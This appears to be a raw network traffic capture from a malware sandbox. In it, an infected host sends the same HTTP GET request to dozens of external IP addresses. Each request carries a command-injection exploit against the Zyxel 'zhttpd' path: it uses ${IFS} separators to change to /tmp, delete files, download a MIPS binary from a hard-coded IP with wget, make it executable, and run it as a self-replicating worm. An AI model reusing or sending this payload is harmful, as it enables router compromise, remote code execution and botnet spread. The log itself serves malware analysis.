                                                Jan 29, 2024 07:07:35.052166939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1144192.168.2.2337358125.162.159.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052212954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1145192.168.2.234017432.219.18.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052244902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1146192.168.2.2356830121.111.90.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052274942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1147192.168.2.234435870.145.237.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052308083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1148192.168.2.2356680205.12.121.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052360058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1149192.168.2.235095876.185.21.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052387953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1150192.168.2.2353498154.199.103.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052401066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1151192.168.2.2341766191.209.91.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052432060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1152192.168.2.2347130144.201.212.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052498102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1153192.168.2.233817267.37.215.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052541018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1154192.168.2.233632017.237.79.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052577972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1155192.168.2.235834043.24.245.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052597046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1156192.168.2.2354192185.28.70.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052628994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1157192.168.2.2354172221.69.37.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052655935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1158192.168.2.235087825.112.215.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052716970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1159192.168.2.235590419.122.164.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052764893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1160192.168.2.2351446158.41.238.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052778006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1161192.168.2.2355650202.4.183.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052812099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1162192.168.2.234267013.130.196.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052855015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1163192.168.2.2334286216.194.0.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052881956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1164192.168.2.2342090119.14.204.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052918911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1165192.168.2.2344590110.229.222.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052958012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1166192.168.2.233616640.15.190.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.052995920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1167192.168.2.2346212137.95.88.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053035975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1168192.168.2.235146250.14.64.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053086996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1169192.168.2.2346316203.80.126.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053112984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1170192.168.2.234548681.75.90.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053177118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1171192.168.2.2343726212.235.22.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053193092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1172192.168.2.23546588.69.239.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053236008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1173192.168.2.235468489.6.128.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053280115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1174192.168.2.233550035.39.98.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053306103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1175192.168.2.236099894.179.209.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053360939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1176192.168.2.234860681.107.250.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053397894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1177192.168.2.2338196187.79.65.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053435087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1178192.168.2.235009488.206.9.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053472996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1179192.168.2.235629459.161.182.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053498983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1180192.168.2.236028888.248.213.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053546906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1181192.168.2.2335014222.169.126.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053575993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1182192.168.2.234787648.35.94.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053638935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1183192.168.2.233555658.62.188.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053663969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1184192.168.2.2337558195.247.244.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053724051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1185192.168.2.2358028144.103.7.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053730011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1186192.168.2.234723485.69.28.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053822994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1187192.168.2.2360002207.95.61.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053850889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1188192.168.2.2353200221.107.227.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053872108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1189192.168.2.235807098.43.134.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053904057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1190192.168.2.23426802.116.215.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053952932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1191192.168.2.2332886189.19.90.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053972006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192192.168.2.2357052121.230.239.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.053996086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1193192.168.2.235828096.113.116.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054049015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1194192.168.2.2354462204.247.243.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054060936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1195192.168.2.234063431.196.150.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054089069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1196192.168.2.2352190168.33.251.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054156065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1197192.168.2.2335226133.44.5.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054193020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1198192.168.2.2354716107.126.26.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054240942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1199192.168.2.235436494.118.112.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054271936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1200192.168.2.2351658206.116.167.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054331064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1201192.168.2.2334040206.223.5.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054363966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1202192.168.2.2344400160.217.194.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054423094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1203192.168.2.23430141.196.192.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054445028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1204192.168.2.2358060146.226.32.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054508924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1205192.168.2.234243894.85.80.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054527998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1206192.168.2.2347974109.250.156.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.054554939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1207192.168.2.2336032110.239.242.156443
                                                TimestampBytes transferredDirectionData
